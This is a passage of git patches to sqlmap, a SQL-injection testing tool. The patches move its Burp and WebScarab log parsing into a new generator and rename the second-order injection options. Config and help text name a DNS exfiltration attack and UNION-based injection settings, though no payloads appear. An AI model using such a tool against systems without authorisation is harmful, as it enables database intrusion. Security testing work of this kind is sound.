re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) + + if schemePort: + scheme = schemePort.group(1) + port = schemePort.group(2) + request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) + else: + scheme, port = None, None + + if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M): + continue + + if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): + continue + + getPostReq = False + url = None + host = None + method = None + data = None + cookie = None + params = False + newline = None + lines = request.split('\n') + headers = [] + + for index in xrange(len(lines)): + line = lines[index] + + if not line.strip() and index == len(lines) - 1: + break + + newline = "\r\n" if line.endswith('\r') else '\n' + line = line.strip('\r') + match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None + + if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: + data = "" + params = True + + elif match: + method = match.group(1) + url = match.group(2) + + if any(_ in line for _ in ('?', '=', kb.customInjectionMark)): + params = True + + getPostReq = True + + # POST parameters + elif data is not None and params: + data += "%s%s" % (line, newline) + + # GET parameters + elif "?" in line and "=" in line and ": " not in line: + params = True + + # Headers + elif re.search(r"\A\S+:", line): + key, value = line.split(":", 1) + value = value.strip().replace("\r", "").replace("\n", "") + + # Cookie and Host headers + if key.upper() == HTTP_HEADER.COOKIE.upper(): + cookie = value + elif key.upper() == HTTP_HEADER.HOST.upper(): + if '://' in value: + scheme, value = value.split('://')[:2] + splitValue = value.split(":") + host = splitValue[0] + + if len(splitValue) > 1: + port = filterStringValue(splitValue[1], "[0-9]") + + # Avoid to add a static content length header to + # headers and consider the following lines as + # POSTed data + if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): + params = True + + # Avoid proxy and connection type related headers + elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION): + headers.append((getUnicode(key), getUnicode(value))) + + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): + params = True + + data = data.rstrip("\r\n") if data else data + + if getPostReq and (params or cookie): + if not port and isinstance(scheme, basestring) and scheme.lower() == "https": + port = "443" + elif not scheme and port == "443": + scheme = "https" + + if conf.forceSSL: + scheme = "https" + port = port or "443" + + if not host: + errMsg = "invalid format of a request file" + raise SqlmapSyntaxException(errMsg) + + if not url.startswith("http"): + url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) + scheme = None + port = None + + if not(conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, conf.method or method, data, cookie, tuple(headers)) + + checkFile(reqFile) + try: + with openFile(reqFile, "rb") as f: + content = f.read() + except (IOError, OSError, MemoryError), ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + + if conf.scope: + logger.info("using regular expression '%s' for filtering targets" % conf.scope) + + for target in _parseBurpLog(content): + yield target + + for target in _parseWebScarabLog(content): + yield target + def getSafeExString(ex, encoding=None): """ Safe way how to get the proper exception represtation as a string diff --git a/lib/core/option.py b/lib/core/option.py index 761ac15d522..bca5974f3e9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -import binascii import cookielib import glob import inspect @@ -47,6 +46,7 @@ from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import openFile +from lib.core.common import parseRequestFile from lib.core.common import parseTargetDirect from lib.core.common import parseTargetUrl from lib.core.common import paths @@ -99,10 +99,7 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.log import FORMATTER from lib.core.optiondict import optDict -from lib.core.settings import BURP_REQUEST_REGEX -from lib.core.settings import BURP_XML_HISTORY_REGEX from lib.core.settings import CODECS_LIST_PAGE -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DBMS_ALIASES from lib.core.settings import DEFAULT_PAGE_ENCODING @@ -119,7 +116,6 @@ from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT -from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import SITE from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX @@ -131,7 +127,6 @@ from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import VERSION_STRING -from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData from lib.core.threads import setDaemon from lib.core.update import update @@ -173,201 +168,6 @@ except NameError: WindowsError = None -def _feedTargetsDict(reqFile, addedTargetUrls): - """ - Parses web scarab and burp logs and adds results to the target URL list - """ - - def _parseWebScarabLog(content): - """ - Parses web scarab logs (POST method not supported) - """ - - reqResList = content.split(WEBSCARAB_SPLITTER) - - for request in reqResList: - url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) - method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) - cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) - - if not method or not url: - logger.debug("not a valid WebScarab log data") - continue - - if method.upper() == HTTPMETHOD.POST: - warnMsg = "POST requests from WebScarab logs aren't supported " - warnMsg += "as their body content is stored in separate files. " - warnMsg += "Nevertheless you can use -r to load them individually." - logger.warning(warnMsg) - continue - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, None, cookie, None)) - addedTargetUrls.add(url) - - def _parseBurpLog(content): - """ - Parses burp logs - """ - - if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): - if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - reqResList = [] - for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - port, request = match.groups() - try: - request = request.decode("base64") - except binascii.Error: - continue - _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) - if _: - host = _.group(0).strip() - if not re.search(r":\d+\Z", host): - request = request.replace(host, "%s:%d" % (host, int(port))) - reqResList.append(request) - else: - reqResList = [content] - else: - reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) - - for match in reqResList: - request = match if isinstance(match, basestring) else match.group(0) - request = re.sub(r"\A[^\w]+", "", request) - - schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) - - if schemePort: - scheme = schemePort.group(1) - port = schemePort.group(2) - request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) - else: - scheme, port = None, None - - if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M): - continue - - if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): - continue - - getPostReq = False - url = None - host = None - method = None - data = None - cookie = None - params = False - newline = None - lines = request.split('\n') - headers = [] - - for index in xrange(len(lines)): - line = lines[index] - - if not line.strip() and index == len(lines) - 1: - break - - newline = "\r\n" if line.endswith('\r') else '\n' - line = line.strip('\r') - match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None - - if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: - data = "" - params = True - - elif match: - method = match.group(1) - url = match.group(2) - - if any(_ in line for _ in ('?', '=', kb.customInjectionMark)): - params = True - - getPostReq = True - - # POST parameters - elif data is not None and params: - data += "%s%s" % (line, newline) - - # GET parameters - elif "?" in line and "=" in line and ": " not in line: - params = True - - # Headers - elif re.search(r"\A\S+:", line): - key, value = line.split(":", 1) - value = value.strip().replace("\r", "").replace("\n", "") - - # Cookie and Host headers - if key.upper() == HTTP_HEADER.COOKIE.upper(): - cookie = value - elif key.upper() == HTTP_HEADER.HOST.upper(): - if '://' in value: - scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") - - # Avoid to add a static content length header to - # headers and consider the following lines as - # POSTed data - if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): - params = True - - # Avoid proxy and connection type related headers - elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION): - headers.append((getUnicode(key), getUnicode(value))) - - if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): - params = True - - data = data.rstrip("\r\n") if data else data - - if getPostReq and (params or cookie): - if not port and isinstance(scheme, basestring) and scheme.lower() == "https": - port = "443" - elif not scheme and port == "443": - scheme = "https" - - if conf.forceSSL: - scheme = "https" - port = port or "443" - - if not host: - errMsg = "invalid format of a request file" - raise SqlmapSyntaxException(errMsg) - - if not url.startswith("http"): - url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) - scheme = None - port = None - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, conf.method or method, data, cookie, tuple(headers))) - addedTargetUrls.add(url) - - checkFile(reqFile) - try: - with openFile(reqFile, "rb") as f: - content = f.read() - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - if conf.scope: - logger.info("using regular expression '%s' for filtering targets" % conf.scope) - - _parseBurpLog(content) - _parseWebScarabLog(content) - - if not addedTargetUrls: - errMsg = "unable to find usable request(s) " - errMsg += "in provided file ('%s')" % reqFile - raise SqlmapGenericException(errMsg) - def _loadQueries(): """ Loads queries from 'xml/queries.xml' file. @@ -413,7 +213,7 @@ def _setMultipleTargets(): """ initialTargetsCount = len(kb.targets) - addedTargetUrls = set() + seen = set() if not conf.logFile: return @@ -426,7 +226,11 @@ def _setMultipleTargets(): raise SqlmapFilePathException(errMsg) if os.path.isfile(conf.logFile): - _feedTargetsDict(conf.logFile, addedTargetUrls) + for target in parseRequestFile(conf.logFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) elif os.path.isdir(conf.logFile): files = os.listdir(conf.logFile) @@ -436,7 +240,11 @@ def _setMultipleTargets(): if not re.search(r"([\d]+)\-request", reqFile): continue - _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls) + for target in parseRequestFile(os.path.join(conf.logFile, reqFile)): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) else: errMsg = "the specified list of targets is not a file " @@ -480,7 +288,7 @@ def _setRequestFromFile(): if not conf.requestFile: return - addedTargetUrls = set() + seen = set() conf.requestFile = safeExpandUser(conf.requestFile) @@ -492,7 +300,11 @@ def _setRequestFromFile(): infoMsg = "parsing HTTP request from '%s'" % conf.requestFile logger.info(infoMsg) - _feedTargetsDict(conf.requestFile, addedTargetUrls) + for target in parseRequestFile(conf.requestFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) def _setCrawler(): if not conf.crawlDepth: diff --git a/lib/core/settings.py b/lib/core/settings.py index 11b898332be..ca9de243406 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.21" +VERSION = "1.2.6.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e1c5360a167..e05247ead60 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -5fb7d0339b64859c6d2bac3341ce496c lib/core/common.py +e57bda5d5e3011b4e2d8e0a21f546e77 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -332d4bb299a0edbc42100e3cfbead285 lib/core/option.py +90a061be1a0658c2bdb197511b61d6fa lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -070499b0c66d5dd7c95dd75ba7d5abe6 lib/core/settings.py +dd2c8c71982173660be8b77f2af0fc3e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 0265b3fcfa87f15d9b865e12b49da3199604399d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:11:49 +0200 Subject: [PATCH 173/428] Second commit regarding #739 --- lib/core/dicts.py | 1 + lib/core/optiondict.py | 2 +- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 2 +- lib/request/connect.py | 4 ++-- sqlmap.conf | 2 +- txt/checksum.md5 | 10 +++++----- 7 files changed, 12 insertions(+), 11 deletions(-) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index c07f65ff41c..a457b0262b5 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -279,6 +279,7 @@ "--binary": "use '--binary-fields' instead", "--auth-private": "use '--auth-file' instead", "--ignore-401": "use '--ignore-code' instead", + "--second-order": "use '--second-url' instead", "--check-payload": None, "--check-waf": None, "--pickled-options": "use '--api -c ...' instead", diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index b1f80398aea..56f1529f298 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -109,7 +109,7 @@ "uChar": "string", "uFrom": "string", "dnsDomain": "string", - "secondOrder": "string", + "secondUrl": "string", }, "Fingerprint": { diff --git a/lib/core/settings.py b/lib/core/settings.py index ca9de243406..83d74d3bc2f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.22" +VERSION = "1.2.6.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b8e843fccd3..ab6b2f8e16e 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -333,7 +333,7 @@ def cmdLineParser(argv=None): techniques.add_option("--dns-domain", dest="dnsDomain", help="Domain name used for DNS exfiltration attack") - techniques.add_option("--second-order", dest="secondOrder", + techniques.add_option("--second-url", dest="secondUrl", help="Resulting page URL searched for second-order response") # Fingerprint options diff --git a/lib/request/connect.py b/lib/request/connect.py index 3ad2ed32d3e..50f287bee13 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1235,8 +1235,8 @@ def _randomizeParameter(paramString, randomParameter): warnMsg += "behavior in custom WAF/IPS/IDS solutions" singleTimeWarnMessage(warnMsg) - if conf.secondOrder: - page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + if conf.secondUrl: + page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/sqlmap.conf b/sqlmap.conf index f29a7be423d..e0c9eda0010 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -388,7 +388,7 @@ dnsDomain = # Resulting page URL searched for second-order response # Valid: string -secondOrder = +secondUrl = [Fingerprint] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e05247ead60..a96a1bd2882 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -34,13 +34,13 @@ e57bda5d5e3011b4e2d8e0a21f546e77 lib/core/common.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py +f92abf47b2a41b75cd4b89ff0c93194c lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py +262b62d685a2403586e6ca0aac2e41d8 lib/core/optiondict.py 90a061be1a0658c2bdb197511b61d6fa lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dd2c8c71982173660be8b77f2af0fc3e lib/core/settings.py +9c986c5efbfe712c434b9372e8572a8d lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -59,7 +59,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -dc7b8fef4125abb26869689b8921b195 lib/parse/cmdline.py +d6ac9df0bafd0ee171380a7b0581f6d2 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -70,7 +70,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -8500dfaccd8ac4a6eecbca266f6327c9 lib/request/connect.py +60c9d366d0f2173d8dc9f504a7e9d374 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 099110bc1f726d930da7aaf10d454bde46fb230d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:14:44 +0200 Subject: [PATCH 174/428] Minor commit regarding #739 --- lib/core/common.py | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8b1192d94e8..f3af4bee243 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4102,6 +4102,7 @@ def checkDeprecatedOptions(args): """ for _ in args: + _ = _.split('=')[0].strip() if _ in DEPRECATED_OPTIONS: errMsg = "switch/option '%s' is deprecated" % _ if DEPRECATED_OPTIONS[_]: diff --git a/lib/core/settings.py b/lib/core/settings.py index 83d74d3bc2f..6f7c876eb27 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.23" +VERSION = "1.2.6.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a96a1bd2882..282acd53a22 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -e57bda5d5e3011b4e2d8e0a21f546e77 lib/core/common.py +cfd0b24b7da8dd85cd29360e9c6fb56a lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9c986c5efbfe712c434b9372e8572a8d lib/core/settings.py +b78d172e50095c1d6612ed52b4c79a6b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From ccda26a567e6e748cbc7bc1c0e2ca7ddc5c94aba Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:23:17 +0200 Subject: [PATCH 175/428] Minor commit regarding #739 --- lib/core/optiondict.py | 1 + lib/core/settings.py | 2 +- lib/parse/cmdline.py | 3 +++ lib/request/connect.py | 2 ++ sqlmap.conf | 14 +++++++++----- txt/checksum.md5 | 8 ++++---- 6 files changed, 20 insertions(+), 10 deletions(-) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 56f1529f298..54d781c4dea 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -110,6 +110,7 @@ "uFrom": "string", "dnsDomain": "string", "secondUrl": "string", + "secondReq": "string", }, "Fingerprint": { diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f7c876eb27..ec1744eac09 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.24" +VERSION = "1.2.6.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index ab6b2f8e16e..dcbf3d876a5 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -336,6 +336,9 @@ def cmdLineParser(argv=None): techniques.add_option("--second-url", dest="secondUrl", help="Resulting page URL searched for second-order response") + techniques.add_option("--second-req", dest="secondReq", + help="Load second-order HTTP request from file") + # Fingerprint options fingerprint = OptionGroup(parser, "Fingerprint") diff --git a/lib/request/connect.py b/lib/request/connect.py index 50f287bee13..a4300d0a44f 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1237,6 +1237,8 @@ def _randomizeParameter(paramString, randomParameter): if conf.secondUrl: page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + elif conf.secondReq: + pass threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/sqlmap.conf b/sqlmap.conf index e0c9eda0010..3d70d3383d0 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -367,29 +367,33 @@ tech = BEUSTQ # Default: 5 timeSec = 5 -# Range of columns to test for +# Range of columns to test for. # Valid: range of integers # Example: 1-10 uCols = -# Character to use for bruteforcing number of columns +# Character to use for bruteforcing number of columns. # Valid: string # Example: NULL uChar = -# Table to use in FROM part of UNION query SQL injection +# Table to use in FROM part of UNION query SQL injection. # Valid: string # Example: INFORMATION_SCHEMA.COLLATIONS uFrom = -# Domain name used for DNS exfiltration attack +# Domain name used for DNS exfiltration attack. # Valid: string dnsDomain = -# Resulting page URL searched for second-order response +# Resulting page URL searched for second-order response. # Valid: string secondUrl = +# Load second-order HTTP request from file. +# Valid: string +secondReq = + [Fingerprint] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 282acd53a22..187f76e69d2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,7 +40,7 @@ bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -262b62d685a2403586e6ca0aac2e41d8 lib/core/optiondict.py +e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py 90a061be1a0658c2bdb197511b61d6fa lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b78d172e50095c1d6612ed52b4c79a6b lib/core/settings.py +dc0d040df74bdf0d6a08f41d412b76e7 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -59,7 +59,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -d6ac9df0bafd0ee171380a7b0581f6d2 lib/parse/cmdline.py +2b3b021a8e7e119d0553c02b110d07d9 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -70,7 +70,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -60c9d366d0f2173d8dc9f504a7e9d374 lib/request/connect.py +607419fd07bcabc274782dbc7b238e8b lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From f1254fef4b46832270e2648d41a8f2c59402c0e9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:39:10 +0200 Subject: [PATCH 176/428] Finalizes implementation for #739 --- lib/core/common.py | 2 +- lib/core/option.py | 42 +++++++++++++++++++++++++++--------------- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 8 ++++---- 5 files changed, 35 insertions(+), 23 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index f3af4bee243..afa82648463 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4504,7 +4504,7 @@ def _parseWebScarabLog(content): continue if not(conf.scope and not re.search(conf.scope, url, re.I)): - yield (url, method, None, cookie, None) + yield (url, method, None, cookie, tuple()) def _parseBurpLog(content): """ diff --git a/lib/core/option.py b/lib/core/option.py index bca5974f3e9..17dd6ab647a 100644 